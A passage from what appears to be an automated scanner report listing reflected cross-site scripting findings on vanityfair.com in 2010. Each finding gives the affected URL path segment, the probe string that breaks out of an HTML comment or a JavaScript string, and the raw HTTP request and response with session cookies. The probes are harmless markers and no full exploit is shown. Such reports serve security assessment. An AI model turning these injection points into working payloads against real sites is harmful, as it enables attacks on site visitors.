This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab-->08e5cc5b50f HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:11 GMT
Date: Mon, 29 Nov 2010 16:49:11 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47894


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...

-:[376882714]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab-->08e5cc5b50f?proxyuri=online%2Fdaily%2F2010%2F11%2Frich-hypocrites-secertly-enjoy-the-meatpacking-district.htmlc68ab--%3E08e5cc5b50f':
escaped absolute path not valid.
->
...[SNIP]...

1.189. http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 20d3b'%3b0d199b8ec01 was submitted in the REST URL parameter 5. This input was echoed as 20d3b';0d199b8ec01 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html20d3b'%3b0d199b8ec01 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:09 GMT
Date: Mon, 29 Nov 2010 16:49:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44668


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
pt type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/rich-hypocrites-secertly-enjoy-the-meatpacking-district.html20d3b';0d199b8ec01',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.190. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8a5d0'%3beff2d52ba02 was submitted in the REST URL parameter 3. This input was echoed as 8a5d0';eff2d52ba02 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/20108a5d0'%3beff2d52ba02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:51 GMT
Date: Mon, 29 Nov 2010 16:48:51 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/20108a5d0';eff2d52ba02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that
...[SNIP]...

1.191. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 1f362-->1d62bf51d02 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/20101f362-->1d62bf51d02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:58:56 GMT
Date: Mon, 29 Nov 2010 16:48:56 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[2016175637]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/20101f362-->1d62bf51d02/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html?proxyuri=online%2Fdaily%2F20101f362--%3E1d62bf51d02%2F11%2Funanswered-questions-concerning-the-mean-girls-2-trailer.html':
escaped abso
...[SNIP]...

1.192. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 4 is copied into an HTML comment. The payload 9dc33-->486fec74ffd was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/119dc33-->486fec74ffd/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:09 GMT
Date: Mon, 29 Nov 2010 16:49:09 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47907


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
use bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[1310428048]:- Thread id: 39. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/119dc33-->486fec74ffd/unanswered-questions-concerning-the-mean-girls-2-trailer.html?proxyuri=online%2Fdaily%2F2010%2F119dc33--%3E486fec74ffd%2Funanswered-questions-concerning-the-mean-girls-2-trailer.html':
escaped absolut
...[SNIP]...

1.193. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload c33a3'%3b4b284b82c25 was submitted in the REST URL parameter 4. This input was echoed as c33a3';4b284b82c25 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11c33a3'%3b4b284b82c25/unanswered-questions-concerning-the-mean-girls-2-trailer.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:08 GMT
Date: Mon, 29 Nov 2010 16:49:08 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11c33a3';4b284b82c25/unanswered-questions-concerning-the-mean-girls-2-trailer.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dr
...[SNIP]...

1.194. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 5 is copied into an HTML comment. The payload e51c8-->12c7cc6591b was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8-->12c7cc6591b HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:28 GMT
Date: Mon, 29 Nov 2010 16:49:28 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47903


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
-:[138621515]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8-->12c7cc6591b?proxyuri=online%2Fdaily%2F2010%2F11%2Funanswered-questions-concerning-the-mean-girls-2-trailer.htmle51c8--%3E12c7cc6591b':
escaped absolute path not valid.
->
...[SNIP]...

1.195. http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html [REST URL parameter 5]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 8b572'%3bd964a373029 was submitted in the REST URL parameter 5. This input was echoed as 8b572';d964a373029 in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html8b572'%3bd964a373029 HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:24 GMT
Date: Mon, 29 Nov 2010 16:49:24 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44671


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
t type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/2010/11/unanswered-questions-concerning-the-mean-girls-2-trailer.html8b572';d964a373029',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that drives the popular dialogue globally.",
keywords : "Vanity
...[SNIP]...

1.196. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6e74d'%3bf61050925fe was submitted in the REST URL parameter 3. This input was echoed as 6e74d';f61050925fe in the application's response.

This behaviour demonstrates that it is possible to terminate the JavaScript string into which our data is being copied. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /online/daily/20106e74d'%3bf61050925fe/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:03 GMT
Date: Mon, 29 Nov 2010 16:49:03 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 44667


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
<script type="text/javascript">
CN.config.set({
title : document.title,
url : 'http://www.vanityfair.com/online/daily/20106e74d';f61050925fe/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html',
description : "From world affairs to entertainment, business to fashion, crime to society, Vanity Fair is a cultural catalyst that dri
...[SNIP]...

1.197. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 3]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

The value of REST URL parameter 3 is copied into an HTML comment. The payload 48872-->a3b76beceaf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to can close the open HTML comment and return to a plain text context. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Remediation detail

Echoing user-controllable data within HTML comment tags does not prevent XSS attacks if the user is able to close the comment or use other techniques to introduce scripts within the comment context.

Request

GET /online/daily/201048872-->a3b76beceaf/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html HTTP/1.1
Host: www.vanityfair.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: anonId=83593254-73ae-4351-9c4c-078a760fe002; JSESSIONID=adbiApDvmXWRS-T2hEyYs.1; s_pers=%20s_vnum_m%3D1291183200494%2526vn%253D1%7C1291183200494%3B%20s_campaign%3D%7C1291053568083%3B%20sinvisit_m%3Dtrue%7C1291053568087%3B%20s_nr%3D1291051768093%7C1293643768093%3B%20s_eVar10%3D%7C1291053568100%3B%20s_depth%3D2%7C1291053568103%3B%20gpv_p5%3Dno%2520value%7C1291053568117%3B; __utmz=122134540.1291051749.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; s_vi=[CS]v1|2679EA9005012EC2-6000010600000C56[CE]; ArrivalCookie=ArrivalCookie; __utma=122134540.197414222.1291051749.1291051749.1291051749.1; SiteLifeHost=l3vm204l3pluckcom; mobify=0; __utmc=122134540; __utmb=122134540.2.10.1291051749;

Response

HTTP/1.1 500 Internal Server Error
Server: Resin/3.1.6
Content-Type: text/html; charset=UTF-8
Vary: Accept-Encoding
Cache-Control: max-age=600
Expires: Mon, 29 Nov 2010 16:59:05 GMT
Date: Mon, 29 Nov 2010 16:49:05 GMT
Connection: close
Connection: Transfer-Encoding
Content-Length: 47859


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/19
...[SNIP]...
[Cause bug: com.amg.condenet.commons.exceptions.ApplicationBug:
-:[163203336]:- Thread id: 40. Cause: java.lang.IllegalArgumentException.
Msg: Invalid uri 'http://blog.vanityfair.com/online/daily/201048872-->a3b76beceaf/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html?proxyuri=online%2Fdaily%2F201048872--%3Ea3b76beceaf%2F11%2Fwhy-sarah-palins-alaska-lost-nearly-half-its-viewers.html':
escaped absolute pat
...[SNIP]...

1.198. http://www.vanityfair.com/online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html [REST URL parameter 4]  previous  next

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.vanityfair.com
Path:   /online/daily/2010/11/why-sarah-palins-alaska-lost-nearly-half-its-viewers.html

Issue detail

